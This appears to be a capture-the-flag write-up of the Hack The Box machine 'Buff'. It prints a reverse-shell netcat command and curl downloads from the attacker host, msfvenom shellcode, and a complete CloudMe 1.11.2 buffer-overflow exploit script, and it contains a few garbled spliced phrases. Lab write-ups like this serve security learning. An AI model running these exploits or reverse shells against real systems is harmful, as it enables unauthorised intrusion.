The first thing that might come into your mind when seeing the machine name, is a Buffer Overflow. If that is the case, you just guessed the procedure to obtain root on this machine. Using an exploit to gain a webshell on this Windows Server is the startingpoint of running the CloudMe Buffer Overflow attack for root.
[0x1] Reconnaissance & Enumeration
Let’s see if we can find some open ports and services as a startingpoint. Port 7680 does not appear to have any function, but 8080 servers a website. Buff is a Windows machine but uses Apache to serve the website. The machine will probably use something like WAMP/XAMP.
nmap -sV -sC -p- -oA nmap_allports 10.10.10.198 Starting Nmap 7.80 ( https://nmap.org ) at 2020-09-05 07:47 EDT Nmap scan report for buff (10.10.10.198) Host is up (0.023s latency). Not shown: 65533 filtered ports PORT STATE SERVICE VERSION 7680/tcp open pando-pub? 8080/tcp open http Apache httpd 2.4.43 ((Win64) OpenSSL/1.1.1g PHP/7.4.6) | http-open-proxy: Potentially OPEN proxy. |_Methods supported:CONNECTION |_http-server-header: Apache/2.4.43 (Win64) OpenSSL/1.1.1g PHP/7.4.6 |_http-title: mrb3n's Bro Hut Service detection performed. Please report any incorrect results at https://nmap.org/submit/ . Nmap done: 1 IP address (1 host up) scanned in 270.15 seconds
The port 8080 is used to run the Gym Management System 1.0. The website itself does not show any interesting information.
[0x2] Initial Foothold
A quick check to see if there might be a known vulnerability I can use with Searchsploit. It finds an Unauthenticated Remote Code Execution vulnerability. Nice!
searchsploit gym --------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------- --------------------------------- Exploit Title | Path --------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------- --------------------------------- Gym Management System 1.0 - Unauthenticated Remote Code Execution | php/webapps/48506.py WordPress Plugin WPGYM - SQL Injection | php/webapps/42801.txt --------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------- --------------------------------- Shellcodes: No Results
I grab the file on my machine and find out that you only need to run the script with the url of the Gym Management system as a paramter. It does require Python 2 which my new Kali install does not like. To speed things up I switch a my parrot machine which still ahs support for Python 2.
python 48506.py http://10.10.10.198:8080/
When the exploit runs it will try to launch the webshell and give you a limited shell to run commands. The exploit is successful and I have a shell as the user: Shaun.
/\ /vvvvvvvvvvvv \--------------------------------------, `^^^^^^^^^^^^ /============BOKU=====================" \/ [+] Successfully connected to webshell. C:\xampp\htdocs\gym\upload> whoami �PNG � buff\shaun
Since the limited shells are not the easiest way to communicate I download Netcat for Windows on the machine to launch a full shell. I have Netcat on my attacker machine and serve it via a quick Python webserver.
python -m SimpleHTTPServer 1337
I then use Curl to download the file from my local webserver to the machine.
curl http://10.10.14.64:1337/nc.exe -o nc.exe
Before running Netcat I started a listener on my local machine for the incomming connection.
netcat -lvnp 9001
With the listener running it’s time to start Netcat and get myself a full shell to Buff.
nc.exe 10.10.14.64 9001 -e cmd.exe
Mission acomplished, the reverse shell is connected without any hassle.
listening on [any] 9001 … connect to [10.10.14.64] from (UNKNOWN) [10.10.10.198] 49689 Microsoft Windows [Version 10.0.17134.1610] (c) 2018 Microsoft Corporation. All rights reserved.
[0x3] Path to User flag
The path to the User flag is not so much as a path. It’s more a simple directory change and reading the text file
Directory of C:\Users\shaun\Desktop 14/07/2020 13:27 <DIR> . 14/07/2020 13:27 <DIR> .. 03/09/2020 16:03 34 user.txt 1 File(s) 34 bytes 2 Dir(s) 8,861,081,600 bytes free
The expected file, in the expected location. I got myself a User flag!
C:\Users\shaun\Desktop>type user.txt type user.txt e6f2c0554599c57df16e0f741afc6321
[0x4] Path to Root flag
The machine does not really contain anything special besides the Xampp installation. I enemerasted this folder a bit but did not find any usefull information. In the Home Directory of Shaun I did noticed a file in the Downloads folder called CloudMe 1.11.2.
Directory of C:\Users\shaun\Downloads 03/09/2020 16:22 <DIR> . 03/09/2020 16:22 <DIR> .. 16/06/2020 16:26 17,830,824 CloudMe_1112.exe 03/09/2020 16:04 59,392 nc.exe 2 File(s) 17,890,216 bytes 2 Dir(s) 8,801,017,856 bytes free
I did a quick check using Searchsploit and found a CloudMe 1.11.2 – Buffer Overflow exploit. Since the machine is called Buff, this does makes sense.
searchsploit CloudMe ----------------------------------------------------------------------------------------------------------------------------------------------------- --------------------------------- Exploit Title | Path ----------------------------------------------------------------------------------------------------------------------------------------------------- --------------------------------- CloudMe 1.11.2 - Buffer Overflow (PoC) | windows/remote/48389.py CloudMe 1.11.2 - Buffer Overflow (SEH_DEP_ASLR) | windows/local/48499.txt Cloudme 1.9 - Buffer Overflow (DEP) (Metasploit) | windows_x86-64/remote/45197.rb CloudMe Sync 1.10.9 - Buffer Overflow (SEH)(DEP Bypass) | windows_x86-64/local/45159.py CloudMe Sync 1.10.9 - Stack-Based Buffer Overflow (Metasploit) | windows/remote/44175.rb CloudMe Sync 1.11.0 - Local Buffer Overflow | windows/local/44470.py CloudMe Sync 1.11.2 - Buffer Overflow + Egghunt | windows/remote/46218.py CloudMe Sync 1.11.2 Buffer Overflow - WoW64 (DEP Bypass) | windows_x86-64/remote/46250.py CloudMe Sync < 1.11.0 - Buffer Overflow | windows/remote/44027.py CloudMe Sync < 1.11.0 - Buffer Overflow (SEH) (DEP Bypass) | windows_x86-64/remote/44784.py ----------------------------------------------------------------------------------------------------------------------------------------------------- --------------------------------- Shellcodes: No Results
The script has to run on the victim machine and use port 8888. The issue here is that Python is noLet;s start t installed on the machine. So running the script on will not work. Someone hinted to the use of Plink and I further checked it out. Plink can be used for forwarding commands to the machine from your own machine. It creates a connection from the machine to your attacker machine over SSH.
Time to download Plink from my machine using Curl.
curl http://10.10.14.64:1337/plink.exe -o plink.exe
Let;s start Plink an create the port forwarding.
C:\xampp\htdocs\gym\upload>plink.exe -l d0p4m1n3 -pw password 10.10.14.64 -R 8888:127.0.0.1:8888 The server's host key is not cached in the registry. You have no guarantee that the server is the computer you think it is. The server's ssh-ed25519 key fingerprint is: ssh-ed25519 255 88:c2:f9:ac:d1:3e:14:26:1e:64:45:31:56:ef:89:5e If you trust this host, enter "y" to add the key to PuTTY's cache and carry on connecting. If you want to carry on connecting just once, without adding the key to the cache, enter "n". If you do not trust this host, press Return to abandon the connection. Store key in cache? (y/n) y Using username "d0p4m1n3". Linux parrot 5.4.0-4parrot1-amd64 #1 SMP Parrot 5.4.19-4parrot1 (2020-02-27) x86_64 ____ _ ____ | _ \ __ _ _ __ _ __ ___ | |_ / ___| ___ ___ | |_) / _` | '__| '__/ _ \| __| \___ \ / _ \/ __| | __/ (_| | | | | | (_) | |_ ___) | __/ (__ |_| \__,_|_| |_| \___/ \__| |____/ \___|\___| The programs included with the Parrot GNU/Linux are free software; the exact distribution terms for each program are described in the individual files in /usr/share/doc/*/copyright. Parrot GNU/Linux comes with ABSOLUTELY NO WARRANTY, to the extent permitted by applicable law.
Using MsfVenom I generate the Python payload for our Buffer Overflow exploit script. The payload is different from the one in the standard exploit file due to the fact that I want it to launch a reverse shell.
msfvenom -p windows/exec CMD='c:\xampp\htdocs\gym\upload\nc.exe -e cmd.exe 10.10.14.64 8443' -b '\x00\x0A\x0D' -f python [-] No platform was selected, choosing Msf::Module::Platform::Windows from the payload [-] No arch selected, selecting arch: x86 from the payload Found 11 compatible encoders Attempting to encode payload with 1 iterations of x86/shikata_ga_nai x86/shikata_ga_nai succeeded with size 273 (iteration=0) x86/shikata_ga_nai chosen with final size 273 Payload size: 273 bytes Final size of python file: 1334 bytes buf = b"" buf += b"\xbe\x16\x92\xb5\xb5\xd9\xc3\xd9\x74\x24\xf4\x5f\x31" buf += b"\xc9\xb1\x3e\x83\xef\xfc\x31\x77\x10\x03\x77\x10\xf4" buf += b"\x67\x49\x5d\x7a\x87\xb2\x9e\x1a\x01\x57\xaf\x1a\x75" buf += b"\x13\x80\xaa\xfd\x71\x2d\x41\x53\x62\xa6\x27\x7c\x85" buf += b"\x0f\x8d\x5a\xa8\x90\xbd\x9f\xab\x12\xbf\xf3\x0b\x2a" buf += b"\x70\x06\x4d\x6b\x6c\xeb\x1f\x24\xfb\x5e\xb0\x41\xb1" buf += b"\x62\x3b\x19\x54\xe3\xd8\xea\x57\xc2\x4e\x60\x0e\xc4" buf += b"\x71\xa5\x3b\x4d\x6a\xaa\x01\x07\x01\x18\xfe\x96\xc3" buf += b"\x50\xff\x35\x2a\x5d\xf2\x44\x6a\x5a\xec\x32\x82\x98" buf += b"\x91\x44\x51\xe2\x4d\xc0\x42\x44\x06\x72\xaf\x74\xcb" buf += b"\xe5\x24\x7a\xa0\x62\x62\x9f\x37\xa6\x18\x9b\xbc\x49" buf += b"\xcf\x2d\x86\x6d\xcb\x76\x5d\x0f\x4a\xd3\x30\x30\x8c" buf += b"\xbc\xed\x94\xc6\x51\xfa\xa4\x84\x3f\xfd\x3b\xb3\x72" buf += b"\xfd\x43\xbc\x22\x95\x72\x37\xad\xe2\x8a\x92\x89\x1c" buf += b"\xc1\xbf\xb8\xb4\x8c\x55\xf9\xd9\x2e\x80\x3e\xe7\xac" buf += b"\x21\xbf\x1c\xac\x43\xba\x59\x6a\xbf\xb6\xf2\x1f\xbf" buf += b"\x65\xf3\x35\xdc\xb3\x57\xce\x42\xa9\x17\x5e\xd9\x59" buf += b"\xa3\xfa\x8e\xfa\x38\x5f\x36\x84\xd3\x03\xcd\x06\x47" buf += b"\xd3\x4c\x83\xcb\x45\xec\x65\x96\xe1\x97\x59\x75\x77" buf += b"\x78\xf9\xe8\x13\x56\x98\x8a\xbe\x86\x53\x5a\x6f\xf6" buf += b"\xa3\xb4\x5e\xcc\xed\xfe\x94\x0c\xca\xca\xe0\x7f\x2a"
With the payload replaced with the newly generated one, the total script looks like this:
# Exploit Title: CloudMe 1.11.2 - Buffer Overflow (PoC) # Date: 2020-04-27 # Exploit Author: Andy Bowden # Vendor Homepage: https://www.cloudme.com/en # Software Link: https://www.cloudme.com/downloads/CloudMe_1112.exe # Version: CloudMe 1.11.2 # Tested on: Windows 10 x86 #Instructions: # Start the CloudMe service and run the script. import socket target = "127.0.0.1" padding1 = b"\x90" * 1052 EIP = b"\xB5\x42\xA8\x68" # 0x68A842B5 -> PUSH ESP, RET NOPS = b"\x90" * 30 #msfvenom -a x86 -p windows/exec CMD=calc.exe -b '\x00\x0A\x0D' -f python payload = b"" payload += b"\xbe\x16\x92\xb5\xb5\xd9\xc3\xd9\x74\x24\xf4\x5f\x31" payload += b"\xc9\xb1\x3e\x83\xef\xfc\x31\x77\x10\x03\x77\x10\xf4" payload += b"\x67\x49\x5d\x7a\x87\xb2\x9e\x1a\x01\x57\xaf\x1a\x75" payload += b"\x13\x80\xaa\xfd\x71\x2d\x41\x53\x62\xa6\x27\x7c\x85" payload += b"\x0f\x8d\x5a\xa8\x90\xbd\x9f\xab\x12\xbf\xf3\x0b\x2a" payload += b"\x70\x06\x4d\x6b\x6c\xeb\x1f\x24\xfb\x5e\xb0\x41\xb1" payload += b"\x62\x3b\x19\x54\xe3\xd8\xea\x57\xc2\x4e\x60\x0e\xc4" payload += b"\x71\xa5\x3b\x4d\x6a\xaa\x01\x07\x01\x18\xfe\x96\xc3" payload += b"\x50\xff\x35\x2a\x5d\xf2\x44\x6a\x5a\xec\x32\x82\x98" payload += b"\x91\x44\x51\xe2\x4d\xc0\x42\x44\x06\x72\xaf\x74\xcb" payload += b"\xe5\x24\x7a\xa0\x62\x62\x9f\x37\xa6\x18\x9b\xbc\x49" payload += b"\xcf\x2d\x86\x6d\xcb\x76\x5d\x0f\x4a\xd3\x30\x30\x8c" payload += b"\xbc\xed\x94\xc6\x51\xfa\xa4\x84\x3f\xfd\x3b\xb3\x72" payload += b"\xfd\x43\xbc\x22\x95\x72\x37\xad\xe2\x8a\x92\x89\x1c" payload += b"\xc1\xbf\xb8\xb4\x8c\x55\xf9\xd9\x2e\x80\x3e\xe7\xac" payload += b"\x21\xbf\x1c\xac\x43\xba\x59\x6a\xbf\xb6\xf2\x1f\xbf" payload += b"\x65\xf3\x35\xdc\xb3\x57\xce\x42\xa9\x17\x5e\xd9\x59" payload += b"\xa3\xfa\x8e\xfa\x38\x5f\x36\x84\xd3\x03\xcd\x06\x47" payload += b"\xd3\x4c\x83\xcb\x45\xec\x65\x96\xe1\x97\x59\x75\x77" payload += b"\x78\xf9\xe8\x13\x56\x98\x8a\xbe\x86\x53\x5a\x6f\xf6" payload += b"\xa3\xb4\x5e\xcc\xed\xfe\x94\x0c\xca\xca\xe0\x7f\x2a" overrun = b"C" * (1500 - len(padding1 + NOPS + EIP + payload)) buf = padding1 + EIP + NOPS + payload + overrun try: s=socket.socket(socket.AF_INET, socket.SOCK_STREAM) s.connect((target,8888)) s.send(buf) except Exception as e: print(sys.exc_value)
Before running the script I need to launch another listener. The port is the one used in the generation of the payload with MsfVenom, 8443.
netcat -lvnp 8443
Let’s launch the Python script which will use the local port 8888 and forward it to the Buff machine.
python 48389.py
And it’s connected! The reverse connection was initiated from Buff to my machine, indicating that the payload did run without interuption. A quick check using whoami shows that the shell runs as Administrator.
Listening on [any] 8443 ... connect to [10.10.14.64] from (UNKNOWN) [10.10.10.198] 49698 Microsoft Windows [VerLast but not least, sion 10.0.17134.1610] (c) 2018 Microsoft Corporation. All rights reserved. C:\Windows\system32>whoami whoami buff\administrator C:\Windows\system32>hostname hostname BUFF
Last but not least, the root-flag to officiale mark this box as rooted.
C:\Windows\system32>type c:\users\administrator\desktop\root.txt 9d5ab2de5c3175ae7a72093b61f0e580
[box type=”warning” align=”” class=”” width=””]All information in this post is for educational use only! Do not use it at others when you do not have explicit approval to do so. I am not responsible for your actions. Using this knowledge for illegal activities could land you in jail![/box]